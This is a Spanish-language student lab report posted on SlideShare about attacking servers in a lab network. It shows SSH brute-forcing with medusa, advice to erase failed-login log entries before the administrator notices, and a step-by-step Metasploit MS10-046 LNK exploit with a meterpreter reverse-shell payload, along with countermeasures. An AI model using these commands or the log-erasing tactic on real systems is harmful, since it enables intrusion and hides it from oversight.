Ahora se procede a identificar cuál es la IP del servidor de correo en esta red. De ahora enadelante, como atacantes se de...
TECSUP          SEGURIDAD INFORMÁTICA         En el caso del servidor de correo, como en las demás IPs escaneadas, se mues...
TECSUP        SEGURIDAD INFORMÁTICAEl comando medusa irá probando contraseñas hasta encontrar una que, dentro de su lista,...
TECSUP         SEGURIDAD INFORMÁTICASin embargo se observa desde el directorio /var/log/secure las conexiones fallidas4
TECSUP          SEGURIDAD INFORMÁTICATodo buen atacante debe de ser capaz de identificar sus conexiones fallidas y elimina...
TECSUP         SEGURIDAD INFORMÁTICAContramedidaExisten contramedidas para evitar el logo excesivo mediante ataques de fue...
TECSUP      SEGURIDAD INFORMÁTICA         2.1.1.1 Internet InformationServices 7.0 se basa en una serie de                ...
TECSUP   SEGURIDAD INFORMÁTICA                           Imagen 1: Windows Server 2008         2.1.1.1.1   Vulnerabilidad ...
TECSUP        SEGURIDAD INFORMÁTICA                          Robo de información;                          Modificación ...
TECSUP          SEGURIDAD INFORMÁTICA                              Imagen2: Windows Server 2008 – netstat –a –n.         N...
TECSUP         SEGURIDAD INFORMÁTICA         En la siguiente imagen se muestra que se esta realizando la conexión.        ...
TECSUP   SEGURIDAD INFORMÁTICA                    Imagen 3: Windows Server 2008 – metasploit.         Una vez dentro del B...
TECSUP         SEGURIDAD INFORMÁTICA                msf>                Cuando cambie el prompt, buscamos el exploit que e...
TECSUP           SEGURIDAD INFORMÁTICA         msf      exploit(ms10_046_shortcut_icon_dllloader)       >         set    P...
TECSUP       SEGURIDAD INFORMÁTICAAhora, sólo es necesario que la máquina víctima entre en nuestra dirección:             ...
TECSUP       SEGURIDAD INFORMÁTICA                 vaya a transferir información critica como login, password, números de ...
TECSUP     SEGURIDAD INFORMÁTICA              Aunque FreeBSD no puede ser propiamente llamado UNIX, al no haber           ...
TECSUP   SEGURIDAD INFORMÁTICA            TFTP en algún lugar de la red. El servidor TFTP se almacenará una copia         ...
TECSUP     SEGURIDAD INFORMÁTICA                       Imagen 10: FreeBSD creación de carpeta tftpboot.            CONTENI...
TECSUP   SEGURIDAD INFORMÁTICA                        Imagen12: FreeBSD. Netstat –a-n.         *Puerto udp6 y up4 son del ...
TECSUP     SEGURIDAD INFORMÁTICA                           Imagen 14: Archivo copiado, intruso.            Se le logro obt...
TECSUP       SEGURIDAD INFORMÁTICA                Ejecutarel comando modo root.                         Imagen 17: Freebsd...
TECSUP      SEGURIDAD INFORMÁTICA                A partir de la versión 9.04, se empezó a ofrecer soporte oficial para    ...
Upcoming SlideShare
Loading in …5
×

Trabajo de seguridad informatica 1

1,045 views

Published on

  • Be the first to comment

  • Be the first to like this

Trabajo de seguridad informatica 1

  1. 1. Ahora se procede a identificar cuál es la IP del servidor de correo en esta red. De ahora enadelante, como atacantes se debe utilizar una herramienta adecuada y no un sistemaoperativo Windows. En este caso se utiliza Backtrack 5Al hacer ping a la dirección web del servicio de correo, estamos ubicando la dirección IPdel servidor, es desde aquí que ya se puede pensar en planear un ataque.Backtrack tiene herramientas de scaneo de puertos de equipos de red. Estas herramientasutilizan el software nmap para scanear puertos de red objetivo, necesarios para evaluarposibles ataques. Zenmap es una herramienta provista de una interfaz gráfica que permite el scaneo de puertos de direcciones.Para lograr este tipo de topología al poner únicamente la dirección IP el Zenmapautomáticamente genera este código
  2. 2. TECSUP SEGURIDAD INFORMÁTICA En el caso del servidor de correo, como en las demás IPs escaneadas, se muestran los puertos abiertos Se puede observar que el puerto 22, utilizado para conexiones remotas está habilitado por lo que puede ser un buen intento un ataque por fuerza bruta, con la esperanza de que no exista ningún sistema de prevención de intrusos, felizmente, en este caso aún no existe esta solución. Los ataques de fuerza bruta constan en el bombardeo sistematizado de contraseñas hacia una cuenta en específica de un sistema operativo. Existen comandos en Backtrack que utilizan este método como medusaohydra.2
  3. 3. TECSUP SEGURIDAD INFORMÁTICAEl comando medusa irá probando contraseñas hasta encontrar una que, dentro de su lista, nos déla contraseña de root.Una vez obtenida la clave se puede establecer una conexión remota con el comando ssh.Como podemos observar estamos conectados gracias al Terminal desde root hasta root@mail contodos los privilegios posibles. Desde aquí se pueden crear y deshacer lo que se requiera. Porejemplo, se puede ver cualquier correo electrónico enviado por cualquier usuario:3
  4. 4. TECSUP SEGURIDAD INFORMÁTICASin embargo se observa desde el directorio /var/log/secure las conexiones fallidas4
  5. 5. TECSUP SEGURIDAD INFORMÁTICATodo buen atacante debe de ser capaz de identificar sus conexiones fallidas y eliminarlas antesque el administrador de red las descubra.Dejando los logs de lado se pretende ahora alojar un virus que explote una vulnerabilidad.El archivo virus.sh es el exploit que se tiene planeado instalar dentro del servidor. Para elloutilizamos el comando scp, que sirve para copiar archivos utilizando en protocolo ssh.El archivo está adentro, sólo falta ejecutarlo.5
  6. 6. TECSUP SEGURIDAD INFORMÁTICAContramedidaExisten contramedidas para evitar el logo excesivo mediante ataques de fuerza bruta, para ello, eladministrador deberá recurrir al archivo donde se encuentra su configuración de firewall yestablecer una nueva política, esta tiene como fin bloquear conexiones entrantes que pasen undeterminado número de veces en un tiempo determinable. 1.1.1. Windows Server 2008 – Web Los servidores web son aquellos cuya tarea es alojar sitios y/o aplicaciones, las cuales son accedidas por los clientes utilizando un navegador que se comunica con el servidor utilizando el protocolo HTTP (hypertextmarkuplanguage). Básicamente un servidor WEB consta de un interprete HTTP el cual se mantiene a la espera de peticiones de clientes y le responde con el contenido según sea solicitado. El cliente, una vez recibido el código, lo interpreta y lo exhibe en pantalla. Además los servidores pueden disponer de un intérprete de otros lenguajes de programación que ejecutan código embebido dentro del código HTMLde las páginas que contiene el sitio antes de enviar el resultado al cliente. Esto se conoce como programación de lado del servidor y utiliza lenguajes como ASP, PHP, Perl y Ajax. Las ventajas de utilizar estos lenguajes radica en la potencia de los mismos ejecutando tareas mas complejas como, por ejemplo acceder a bases de datos abstrayendo al cliente de toda la operación.6
  7. 7. TECSUP SEGURIDAD INFORMÁTICA 2.1.1.1 Internet InformationServices 7.0 se basa en una serie de funcionalidades y características:  Modelo de extensibilidad flexible, que permite un elevado nivel de personalización  Potentes herramientas de diagnóstico y solución de incidencias  Administración delegada  Mayor nivel de seguridad y menor superficie de ataque  Despliegue de aplicaciones basado realmente en XCOPY  Gestión de aplicaciones y estado de salud del entorno integrados mediante los servicios WCF (Windows CommunicationFoundation)  Herramientas administrativas mejoradas7
  8. 8. TECSUP SEGURIDAD INFORMÁTICA Imagen 1: Windows Server 2008 2.1.1.1.1 Vulnerabilidad de los servicios en la Web El protocolo HTTP (o HTTPS) representa el estándar que posibilita la transferencia de páginas Web a través de un sistema de solicitud y respuesta. Internet, que se utiliza principalmente para transferir páginas Web estáticas, se ha convertido rápidamente en una herramienta interactiva que permite proporcionar servicios en línea. El término "aplicación Web" se refiere a cualquier aplicación a cuya interfaz se pueda acceder en la Web desde un simple navegador. Hoy en día, el protocolo HTTP, la base para una determinada cantidad de tecnologías (SOAP, Javascript, XML-RPC, etc.), juega un indudable papel estratégico en la seguridad de sistemas de información. 2.1.1.1.2 Impacto de los ataques en la Web Los ataques a las aplicaciones Web siempre son dañinos ya que proporcionan una mala imagen a la empresa. Un ataque exitoso puede provocar cualquiera de las siguientes consecuencias:  Desfiguración de la página Web;8
  9. 9. TECSUP SEGURIDAD INFORMÁTICA  Robo de información;  Modificación de datos, y en particular la modificación de datos personales de los usuarios;  Intrusión en el servidor Web. 2.1.1.2 Empezando el Ataque El atacante debe, de alguna manera colocar un cebo a la víctima, para que visite la web falsa del atacante. Hay varias maneras para hacer esto, poner un link en cualquier página que visite la víctima, engañar a los motores de búsqueda, o incluso, si se sabe su dirección de mail, enviarle uno para que visite la página. Antes del atacar el Servidor Web1.- la siguiente imagen muestra la pagina web www.acme.com2.- En el servidor web visualizar los puertos abiertos con el comando netstat –a –n una vezya instalado el servidor web9
  10. 10. TECSUP SEGURIDAD INFORMÁTICA Imagen2: Windows Server 2008 – netstat –a –n. Nota: El servidor web puede ser visto desde una red externa ya que el IPS le dio salida a internet. Durante el ataque Escanear las vulnerabilidades del SERVIDOR WEB Para el ataque al servidor web usaremos una computadora con Backtrack 5. Abrir un terminal y ejecutar el comando armitage& y saldrá una ventana donde solo se dará clic en Start MSF10
  11. 11. TECSUP SEGURIDAD INFORMÁTICA En la siguiente imagen se muestra que se esta realizando la conexión. En la siguiente venta ir a hosts >NmapScan>IntefaceScanall TCP ports y sadrá una pequeña ventana en donde se pone la IP del servidor Web 192.168.80.202/2411
  12. 12. TECSUP SEGURIDAD INFORMÁTICA Imagen 3: Windows Server 2008 – metasploit. Una vez dentro del BT nos situamos en la ruta de framework3 y actualizamos la suite de Metasploit para obtener los últimos exploits. msf#: cd /pentest/exploits/framework3 msf: /pentest/exploits/framework3# svnupdate Ingresamos ahora a la consola de Metasploit: bt: /pentest/exploits/framework3# ./msfconsole12
  13. 13. TECSUP SEGURIDAD INFORMÁTICA msf> Cuando cambie el prompt, buscamos el exploit que explota esta vulnerabilidad y lo seleccionamos: msf> search lnk msf> use windows/browser/ms10_046_shortcut_icon_dllloader Imagen 4: Winows Server 2008 – explota vulnerabilidades. Veamos los parámetros necesarios para este exploit: msf exploit(ms10_046_shortcut_icon_dllloader) > info Comenzamos a configurar el exploit: msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.80.202 SRVHOST => 192.168.80.202 (Donde 192.168.0.106 es la ip de la máquina atacante, donde estamos corriendo Metasploit). Los demás parámetros los dejamos con el valor que viene por defecto. A continuación seleccionamos un PAYLOAD, en este caso una consola de meterpreter:13
  14. 14. TECSUP SEGURIDAD INFORMÁTICA msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp Configuramos el PAYLOAD: msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.80.202 LHOST => 192.168.80.202 msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4462 LPORT => 4462 Nota: El puerto designado anteriormente debemos cerciorarnos de que no esté siendo utilizado por otra aplicación, ya que será el socket medio del ataque, es decir, cuando la víctima ingrese a nuestra dirección ya sea por navegador, explorador Windows o USB, nos dará una Shell de meterpreter a través del puerto 4462 (puede establecerse cualquier otro puerto).14
  15. 15. TECSUP SEGURIDAD INFORMÁTICAAhora, sólo es necesario que la máquina víctima entre en nuestra dirección: Imagen 5:Windows Server 2008. Cuando la máquina víctima visite la página web con su navegador será redirigido a un recurso compartido en la máquina atacante. Entonces se abrirá el explorador de Windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del PAYLOAD. 2.1.1.3 Acciones de corrección en el Web Spoofing Web Spoofing es un ataque peligroso, y difícilmente detectable, que hoy por hoy se puede llevar a cabo en Internet. Afortunadamente hay algunas medidas preventivas que se pueden practicar: a) Soluciones a corto plazo: 1.- Desactivar la opción de JavaScript en el navegador. 2.- Asegurarse en todo momento que la barra de navegación está activa. 3.- ESTA ES LA MÁS IMPORTANTE: Poner atención a las URL que se enseñan en la barra de estado, asegurándote que siempre apuntan al sitio que quieras entrar. Hoy en día tanto JavaScript, como Active-X, como Java tienden a facilitar las técnicas de spoofing, así que desde aquí recomendamos al lector que las desactive de su navegador, al menos en los momentos que15
  16. 16. TECSUP SEGURIDAD INFORMÁTICA vaya a transferir información critica como login, password, números de tarjeta de crédito o cuenta bancaria, etc. b) Soluciones a largo plazo: Todavía no se ha descubierto ningún método para evitar este ataque. 1.1.2. FreeBSD 8.3 – TFTP. FreeBSD es un avanzado sistema operativo para arquitecturas x86 compatibles (como Pentium® y Athlon™), amd64 compatibles (como Opteron™, Athlon™64 EM64T), UltraSPARC®, IA-64, PC-98 y ARM. FreeBSD es un derivado de BSD, la versión de UNIX® desarrollada en la Universidad de California, Berkeley. FreeBSD es desarrollado y mantenido por un numeroso equipo de personas. El soporte para otras arquitecturas está en diferentes fases de desarrollo. Imagen 6: Freebsd –tftp. 2.1.1.4 CARACTERISTICAS FreeBSD es un sistema operativo multiusuario, capaz de efectuar multitarea con apropiación y multiproceso en plataformas compatibles con múltiples procesadores.16
  17. 17. TECSUP SEGURIDAD INFORMÁTICA Aunque FreeBSD no puede ser propiamente llamado UNIX, al no haber adquirido la debida licencia de The Open Group. El sistema FreeBSD incluye el núcleo, la estructura de ficheros del sistema, bibliotecas de la API de C, y algunas utilidades básicas. La versión trajo importantes mejoras como mayor apoyo para dispositivos Bluetooth y controladores para tarjetas de sonido y red. 2.1.1.5 VERSIONES FREEBSD Imagen 7: Versiones FreebSD. 2.1.1.6 SERVICO TFTP EN FREEBSD La utilidad más común utilizada para realizar copias de seguridad de dispositivos y actualizaciones es TFTP, el Trivial File Transfer Protocol. Esta utilidad es similar a FTP, excepto que se ha desmontado en funcionalidad con el fin de encajar en un chip, por lo que el "trivial". Los dispositivos de hardware, como por ejemplo un router o switch Cisco, contienen un cliente TFTP. Depende de usted para crear un servidor17
  18. 18. TECSUP SEGURIDAD INFORMÁTICA TFTP en algún lugar de la red. El servidor TFTP se almacenará una copia de seguridad de las configuraciones y las imágenes (o sistemas operativos) de los dispositivos de hardware dentro de su red. Habilitación de un servidor TFTP Su sistema FreeBSD ya contiene un servidor TFTP, lo que significa que no tiene que instalar ningún software adicional. Sólo tienes que activar el servicio TFTP y configurar correctamente un directorio. Vamos a empezar por activar el servicio. Como superusuario, use su editor favorito para abrir el archivo /etc/inetd.conf . tftpdgramudp wait root /usr/libexec/tftpdtftpd -s /tftpboot #tftpdgram udp6 wait root /usr/libexec/tftpdtftpd -s /tftpboot Imagen 8: FreeBSD: /etc/ined.conf. Modificamos /etc/rc.conf: Imagen 9:/etc/rc.conf Creación de carpeta TFTPBOOT18
  19. 19. TECSUP SEGURIDAD INFORMÁTICA Imagen 10: FreeBSD creación de carpeta tftpboot. CONTENIDO Imagen 11: FreeBSD.Archivos de la carpeta. 2.1.1.7 VULNERABILIDADES 2.1.1.7.1 Puertos Abiertos: Netstat –a-n19
  20. 20. TECSUP SEGURIDAD INFORMÁTICA Imagen12: FreeBSD. Netstat –a-n. *Puerto udp6 y up4 son del servicio ftp que brinda la empresa ACME. Intruso I1: Imagen 13: Intruso I1.20
  21. 21. TECSUP SEGURIDAD INFORMÁTICA Imagen 14: Archivo copiado, intruso. Se le logro obtener el archivo: magro, sin ningún problema (Vulnerabilidad alta). 2.1.1.7.2 La Vulnerabilidad De Ejecución Telnetd Imagen 15: FreeBSD. Vulneralidadtelnetd. 2.1.1.8 CONTRAMEDIDAS. Descargar el parche correspondiente desde la siguiente ubicación y verificar la firma. Imagen 16: FreeBSD. Poner parches.21
  22. 22. TECSUP SEGURIDAD INFORMÁTICA Ejecutarel comando modo root. Imagen 17: Freebsdinstalación de parche. 1.1.3. UBUNTU 10.10– DNS. Ubuntu es un sistema operativo mantenido por Canonical y la comunidad de desarrolladores. Utiliza un núcleo Linux, y su origen está basado en Debian. Ubuntu está orientado al usuario novel y promedio, con un fuerte enfoque en la facilidad de uso y mejorar la experiencia de usuario. Está compuesto de múltiple software normalmente distribuido bajo una licencia libre o de código abierto. Imagen 18: Ubuntu 10.10. 2.1.1.9 CARACTERISTICAS En su última versión, Ubuntu soporta oficialmente dos arquitecturas de hardware en computadoras personales y servidores: 32-bit y 64-bit. Sin embargo, extraoficialmente, Ubuntu ha sido portado a dos arquitecturas más: SPARC y IA-64.22
  23. 23. TECSUP SEGURIDAD INFORMÁTICA A partir de la versión 9.04, se empezó a ofrecer soporte oficial para procesadores ARM, comúnmente usados en dispositivos móviles. Al igual que la mayoría de los sistemas de escritorio basados en Linux, Ubuntu es capaz de actualizar a la vez todas las aplicaciones instaladas en la máquina a través de repositorios. Ubuntu está siendo traducido a más de 130 idiomas, y cada usuario es capaz de colaborar voluntariamente a esta causa, a través de Internet. 2.1.1.10 VERSIONES Imagen 19: Ubuntu Versiones.23

×